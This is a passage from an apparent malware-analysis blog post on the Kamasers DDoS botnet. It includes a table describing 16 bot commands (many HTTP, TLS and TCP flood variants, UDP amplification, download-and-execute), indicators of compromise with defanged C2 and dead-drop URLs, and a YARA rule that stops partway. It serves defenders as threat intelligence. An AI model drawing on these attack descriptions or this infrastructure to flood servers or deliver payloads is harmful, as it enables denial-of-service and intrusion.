https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-300x131.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-768x334.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-1536x669.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-2048x892.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-370x161.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-270x118.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/03\/Screenshot-2026-03-24-at-19.16.58-740x322.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN\u2019s&nbsp;sandbox&nbsp;sessions related to the&nbsp;Kamasers&nbsp;attacks displayed inside TI&nbsp;Lookup<\/em>&nbsp;<\/figcaption><\/figure><\/div>\n\n\n<p>By pivoting from one confirmed sample, security teams can turn a single investigation into broader visibility across related botnet activity.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusion&nbsp;<\/h2>\n\n\n\n<p>Kamasers is a sophisticated&nbsp;<strong>DDoS botnet<\/strong>&nbsp;with a well-designed architecture. Its use of a&nbsp;<strong>Dead Drop Resolver<\/strong>&nbsp;through legitimate services makes its C2 infrastructure highly resilient to&nbsp;takedown&nbsp;efforts. The presence of&nbsp;<strong>16 different attack methods<\/strong>, including modern vectors such as&nbsp;<strong>GraphQL<\/strong>&nbsp;and&nbsp;<strong>HTTP bypass<\/strong>, along with advanced implementations of classic techniques, makes&nbsp;<strong>Kamasers<\/strong>&nbsp;a highly versatile tool for carrying out DDoS attacks.&nbsp;<\/p>\n\n\n\n<p>For business leaders,&nbsp;Kamasers&nbsp;shows that resilient, multi-vector botnets can threaten not only infrastructure, but also uptime, customer experience, and revenue-critical operations.&nbsp;<\/p>\n\n\n\n<p><a href=\"https:\/\/any.run\/enterprise\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktoenterprise#contact-sales\" target=\"_blank\" rel=\"noreferrer noopener\">Power faster, clearer investigations with&nbsp;ANY.RUN&nbsp;\u279c<\/a>&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">About ANY.RUN&nbsp;<\/h2>\n\n\n\n<p><a href=\"https:\/\/any.run\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktolanding\" target=\"_blank\" rel=\"noreferrer noopener\">ANY.RUN<\/a>, a leading provider of&nbsp;<a href=\"https:\/\/any.run\/features\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktosandboxlanding\" target=\"_blank\" rel=\"noreferrer noopener\">interactive malware analysis<\/a>&nbsp;and threat intelligence solutions, fits naturally into modern SOC workflows and supports investigations from&nbsp;initial&nbsp;alert to final containment.&nbsp;&nbsp;<\/p>\n\n\n\n<p>It allows teams to safely execute suspicious files and URLs,&nbsp;observe&nbsp;real behavior in an interactive environment, enrich indicators with immediate context through&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-lookup\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktotilookuplanding\" target=\"_blank\" rel=\"noreferrer noopener\">TI Lookup<\/a>, and continuously&nbsp;monitor&nbsp;emerging infrastructure&nbsp;using&nbsp;<a href=\"https:\/\/any.run\/threat-intelligence-feeds\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktotifeedslanding\" target=\"_blank\" rel=\"noreferrer noopener\">Threat Intelligence Feeds<\/a>. Together, these capabilities help&nbsp;reduce uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.&nbsp;&nbsp;<\/p>\n\n\n\n<p>ANY.RUN also meets enterprise security and compliance expectations. The company is&nbsp;<a href=\"https:\/\/any.run\/compliance\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=kamasers-technical-analysis&amp;utm_term=250326&amp;utm_content=linktocompliance\" target=\"_blank\" rel=\"noreferrer noopener\">SOC 2 Type II certified,<\/a>&nbsp;reinforcing its commitment to protecting customer data and&nbsp;maintaining&nbsp;strong security controls.&nbsp;&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Complete List of&nbsp;Kamasers&nbsp;Commands&nbsp;<\/h2>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-287\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"17\"\n           data-wpID=\"287\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:8px;\n                    \"\n                    >\n                                        Command\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:8px;\n                    \"\n                    >\n                                        Purpose\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !stop\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        Stops the current operation. Closes sockets,\u00a0terminates\u00a0attack threads, and clears buffers.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !download\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        <p>Downloads and executes a file. Retrieves a PE file over HTTP, verifies it, and launches it. Also detects whether the file has been removed by antivirus software.<\/p>                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !visiturl\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        <div data-type-content=\"wpdt-html-content\">Sends a basic HTTP GET request to the specified URL to generate traffic or check availability.<\/div>                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !httpget\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        <div data-type-content=\"wpdt-html-content\">Basic HTTP GET flood implementation. Spawns several dozen threads with minimal randomization.<\/div>                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !httpgetpro\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        <div data-type-content=\"wpdt-html-content\">Advanced HTTP GET flood. Spawns hundreds of threads, randomizes the User-Agent, Referer, URL paths, and parameters. Uses keep-alive connections.<\/div>                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !httppost\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        <div data-type-content=\"wpdt-html-content\">HTTP POST flood. Sends POST requests with randomized headers and payloads, creating load on server-side data processing.<\/div>                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !tlsflood\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        TLS handshake flood. Initiates SSL\/TLS handshakes without completing them, creating load on the server\u2019s cryptographic operations.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !httpbypass\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        <div data-type-content=\"wpdt-html-content\">HTTP attack with defense evasion. Uses WAF\/CDN bypass techniques such as header manipulation, payload encoding, and request fragmentation.<\/div>                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A10\"\n                    data-col-index=\"0\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !graphql\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B10\"\n                    data-col-index=\"1\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        GraphQL\u00a0API flood. Sends deeply nested\u00a0GraphQL\u00a0queries that create exponential load on the server parser.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A11\"\n                    data-col-index=\"0\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !httphulk\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B11\"\n                    data-col-index=\"1\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        HULK attack (HTTP Unbearable Load King). Applies\u00a0maximumrandomization to all HTTP request parameters to bypass caching and rate limiting.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A12\"\n                    data-col-index=\"0\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !fastflood\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B12\"\n                    data-col-index=\"1\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        Optimized\u00a0high-speed flood with minimal overhead, designed to saturate available bandwidth.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A13\"\n                    data-col-index=\"0\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !proloris\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B13\"\n                    data-col-index=\"1\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        Professional implementation of\u00a0Slowloris. Slowly sends partial HTTP headers to exhaust the server\u2019s connection pool.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A14\"\n                    data-col-index=\"0\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !slowread\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B14\"\n                    data-col-index=\"1\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        Slow Read attack. Requests a large file and reads it very slowly to tie up server resources.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A15\"\n                    data-col-index=\"0\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !udppro\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B15\"\n                    data-col-index=\"1\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        Professional UDP flood with support for IP spoofing and NTP\/DNS amplification.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A16\"\n                    data-col-index=\"0\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !tcppro\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B16\"\n                    data-col-index=\"1\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        Advanced TCP\u00a0flood.\u00a0Combines SYN flood, ACK flood, and connection reset techniques to exhaust the TCP state table.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-justify wpdt-bold\"\n                                            data-cell-id=\"A17\"\n                    data-col-index=\"0\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        !tcphold\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-justify\"\n                                            data-cell-id=\"B17\"\n                    data-col-index=\"1\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:8px;\n                    \"\n                    >\n                                        TCP connection holding. Establishes the maximum number of connections while\u00a0maintaining\u00a0minimal keep-alive traffic to exhaust server limits.\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-287'>\ntable#wpdtSimpleTable-287{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-287 td, table.wpdtSimpleTable287 th { white-space: normal !important; }\n<\/style>\n\n\n\n\n<h2 class=\"wp-block-heading\">Indicators&nbsp;of&nbsp;Compromise&nbsp;(IOCs)&nbsp;&nbsp;&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>F6c6e16a392be4dbf9a3cf1085b4ffc005b0931fc8eeb5fedf1c7561b2e5ad6b<\/li>\n\n\n\n<li>Dd305f7f1131898c736c97f43c6729bf57d3980fc269400d23412a282ee71a9a<\/li>\n\n\n\n<li>hxxp:\/\/45[.]151[.]91[.]187\/pa[.]php<\/li>\n\n\n\n<li>hxxp:\/\/91[.]92[.]240[.]50\/pit\/wp[.]php<\/li>\n\n\n\n<li>071a1960fbd7114ca87d9da138908722d7f1c02af90ea2db1963915fbe234c52<\/li>\n\n\n\n<li>hxxp:\/\/178[.]16[.]54[.]87\/uda\/ph[.]php<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>C2 Infrastructure (DDR):<\/strong>\u00a0<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>gist[.]github[.]com\/pitybugak\/5d16b75e8bd071e15b04cc9c06dcfafa[.]js<\/li>\n\n\n\n<li>api[.]telegram[.]org\/bot8215158687:AAFgSmsaxfsJozcHIIYPv-HytZ3eCEaUrKg<\/li>\n\n\n\n<li>dl[.]dropboxusercontent[.]com\/s\/jqvpmc0kwg6ffi1mineh2\/fj[.]txt<\/li>\n\n\n\n<li>Bitbucket[.]org\/serky\/repyx\/raw\/main\/fq[.]txt<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Fallback&nbsp;domains:<\/strong>&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pitybux[.]com<\/li>\n\n\n\n<li>ryxuz[.]com<\/li>\n\n\n\n<li>toksm[.]com<\/li>\n\n\n\n<li>Boskuh[.]com<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Yara&nbsp;rules:&nbsp;<\/h3>\n\n\n\n<p>rule&nbsp;Kamasers&nbsp;{&nbsp;<\/p>\n\n\n\n<p><strong>&nbsp;&nbsp;&nbsp; meta:&nbsp;<\/strong><\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;description&nbsp;= &#8220;Detects&nbsp;Kamasers&nbsp;DDoS botnet&#8221;&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;author&nbsp;= &#8220;ANY.RUN&#8221;&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;date&nbsp;= &#8220;2026-02-11&#8221;&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;threat&nbsp;= &#8220;Kamasers&#8221;&nbsp;<\/p>\n\n\n\n<p><strong>&nbsp;&nbsp;&nbsp;&nbsp;strings:&nbsp;<\/strong><\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd1 = &#8220;!stop&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd2 = &#8220;!download&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd3 = &#8220;!visiturl&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd4 = &#8220;!httpget&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd5 = &#8220;!httpgetpro&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd6 = &#8220;!httppost&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd7 = &#8220;!tlsflood&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd8 = &#8220;!httpbypass&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd9 = &#8220;!graphql&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd10 = &#8220;!httphulk&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd11 = &#8220;!fastflood&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd12 = &#8220;!proloris&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd13 = &#8220;!slowread&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd14 = &#8220;!udppro&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd15 = &#8220;!tcppro&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $cmd16 = &#8220;!tcphold&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg1 = &#8220;Task&nbsp;completed:&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg2 = &#8220;Task&nbsp;completed:&nbsp;GraphQL&nbsp;Flood&nbsp;on&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg3 = &#8220;Task&nbsp;completed: HULK&nbsp;on&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg4 = &#8220;Task&nbsp;completed: UDPPRO&nbsp;Flood&nbsp;on&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg5 = &#8220;Task&nbsp;completed: TCPPRO&nbsp;Flood&nbsp;on&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg6 = &#8220;Task&nbsp;completed: TCP HOLD&nbsp;on&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg7 = &#8220;Task&nbsp;completed:&nbsp;Download&nbsp;&amp;&nbsp;Execute&nbsp;from&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg8 = &#8220;Task&nbsp;completed:&nbsp;Visit&nbsp;URL&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg9 = &#8220;Starting&nbsp;GraphQL&nbsp;Flood&nbsp;on&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg10 = &#8220;Starting&nbsp;HULK&nbsp;on&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg11 = &#8220;Starting&nbsp;UDP PRO&nbsp;on&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg12 = &#8220;Starting&nbsp;TCP PRO&nbsp;on&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg13 = &#8220;Starting&nbsp;TCP HOLD&nbsp;on&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg14 = &#8220;Starting&nbsp;Visit&nbsp;URL&nbsp;task&nbsp;on&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg15 = &#8220;Runtime&nbsp;error&nbsp;in D&amp;E&nbsp;task:&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg16 = &#8220;Unknown&nbsp;exception&nbsp;in&nbsp;DownloadAndExecuteTask&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg17 = &#8220;Awaiting&nbsp;task&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg18 = &#8220;Downloading&nbsp;file&nbsp;from:&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg19 = &#8220;Downloaded&nbsp;file&nbsp;disappeared&nbsp;(AV\/EDR?)&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg20 = &#8220;Download&nbsp;failed&nbsp;with&nbsp;HRESULT:&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg21 = &#8220;HTTP GET&nbsp;Flood&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg22 = &#8220;HTTP GET PRO&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg23 = &#8220;HTTP POST&nbsp;Flood&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $msg24 = &#8220;HULK_POST&#8221;&nbsp;ascii&nbsp;fullword&nbsp;<\/p>\n\n\n\n<p><strong>&nbsp;&nbsp;&nbsp;&nbsp;condition:&nbsp;<\/strong><\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; uint16(0) == 0x5A4D&nbsp;and&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (10&nbsp;of&nbsp;($cmd*))&nbsp;and&nbsp;<\/p>\n\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 